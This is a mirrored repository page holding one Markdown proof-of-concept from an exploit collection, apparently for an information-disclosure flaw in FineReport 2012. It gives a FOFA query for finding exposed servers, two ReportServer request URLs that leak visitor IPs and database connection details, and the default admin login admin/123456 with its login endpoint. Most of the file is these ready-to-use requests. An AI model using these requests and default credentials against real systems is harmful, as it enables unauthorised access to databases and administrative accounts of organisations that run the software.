admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/帆软报表 2012 信息泄露漏洞.md
Threekiii 8b4e8ec87c OA产品漏洞
2022-02-21 09:35:01 +08:00

47 lines
827 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 帆软报表 2012 信息泄露漏洞
## 漏洞描述
帆软报表 2012 存在信息泄露漏洞通过访问特定的Url获取部分敏感信息
## 漏洞影响
```
帆软报表 2012
```
## FOFA
```
body="down.download?FM_SYS_ID"
```
## 漏洞复现
获取登录报表系统的IP
```plain
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false
```
![image-20220209113026424](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130468.png)
数据库信息泄露
```plain
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
```
![image-20220209113041021](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130098.png)
后台默认口令 admin/123456
```plain
/ReportServer?op=fr_auth&cmd=ah_login&_=new%20Date().getTime()
```
Reference in New Issue View Git Blame Copy Permalink